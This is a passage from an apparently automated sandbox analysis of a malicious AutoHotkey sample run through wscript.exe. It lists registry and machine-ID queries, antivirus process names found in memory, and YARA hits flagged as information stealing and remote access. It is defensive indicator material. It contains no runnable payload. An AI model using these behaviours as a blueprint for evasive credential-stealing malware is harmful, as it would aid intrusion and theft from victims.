Source: AutoHotkey.exe.0.dr Binary or memory string: "%-1.300s"The maximum number of MsgBoxes has been reached.IsHungAppWindowDwmGetWindowAttributedwmapi.dllahk_idpidgroup%s%uProgram ManagerProgmanWorkerWError text not found (please report)Q\E{0,DEFINEUTF16)UCP)NO_START_OPT)CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument is compiled in 8 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: C:\NwiQ\AutoHotkey.exe Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 1_2_04846735
Source: C:\NwiQ\AutoHotkey.exe Code function: GetLocaleInfoA,GetACP, 1_2_0484D6F5
Source: C:\NwiQ\AutoHotkey.exe Code function: GetLocaleInfoA, 1_2_0484C08D
Source: C:\NwiQ\AutoHotkey.exe Code function: GetLocaleInfoA, 1_2_04847089
Source: C:\NwiQ\AutoHotkey.exe Code function: GetLocaleInfoA, 1_2_0484C0D9
Source: C:\NwiQ\AutoHotkey.exe Code function: lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA, 1_2_0484683F
Source: C:\NwiQ\AutoHotkey.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductID Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\NwiQ\file.zip VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0041EF50 GetFileAttributesW,SetCurrentDirectoryW,GetSystemTimeAsFileTime, 1_2_0041EF50
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0044F450 GetComputerNameW,GetUserNameW, 1_2_0044F450
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0041A00E RtlGetVersion,__snwprintf, 1_2_0041A00E
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: mcshield.exe
Source: AutoHotkey.exe, AutoHotkey.exe, 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp Binary or memory string: superantispyware.exe

Stealing of Sensitive Information

Source: Yara match File source: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
Source: Yara match File source: 00000001.00000002.1665821526.0000000004840000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
Source: AutoHotkey.exe Binary or memory string: WIN_XP
Source: AutoHotkey.exe.0.dr Binary or memory string: ?*A Goto/Gosub must not jump into a block that doesn't enclose it.ddddddd%02d%dmsSlowLogoffSingleWIN32_NTWIN_8.1WIN_8WIN_7WIN_VISTAWIN_XPWIN_2003WIN_2000%04hX0x%Ix*pPIntStrPtrShortInt64DoubleAStrWStrgdi32comctl32kernel32W-3-4CDecl-2This DllCall requires a prior VarSetCapacity.Pos%sLen%sPos%dLen%dLenMarkCountarraypcre_calloutCompile error %d at offset %d: %hs-+0 #diouxXeEfgGaAcCpULlTt%0.*fCallbackCcFfSelectVisCenterUniDescLogicalNoSortAutoHdrFirstBoldExpandGDI+JoyJoyXJoyYJoyZJoyRJoyUJoyVJoyPOVJoyNameJoyButtonsJoyAxesJoyInfoGetProcessImageFileNameWpsapi
Source: AutoHotkey.exe Binary or memory string: WIN_VISTA
Source: AutoHotkey.exe Binary or memory string: WIN_7
Source: AutoHotkey.exe Binary or memory string: WIN_8
Source: AutoHotkey.exe Binary or memory string: WIN_8.1

Remote Access Functionality

Source: Yara match File source: 00000001.00000002.1665821526.00000000048AA000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: AutoHotkey.exe PID: 6544, type: MEMORYSTR
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0041E430 AddClipboardFormatListener,PostMessageW,SetClipboardViewer,RemoveClipboardFormatListener,ChangeClipboardChain, 1_2_0041E430
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0041D9D0 Shell_NotifyIconW,RemoveClipboardFormatListener,ChangeClipboardChain,DestroyWindow,DestroyWindow,DeleteObject,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DeleteObject,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,DeleteObject,DeleteObject,DeleteObject,DestroyIcon,DestroyIcon,IsWindow,DestroyWindow,DeleteObject,mciSendStringW,mciSendStringW,mciSendStringW,DeleteCriticalSection,OleUninitialize,_free,_free,_free, 1_2_0041D9D0
Source: C:\NwiQ\AutoHotkey.exe Code function: 1_2_0485CA8D bind, 1_2_0485CA8D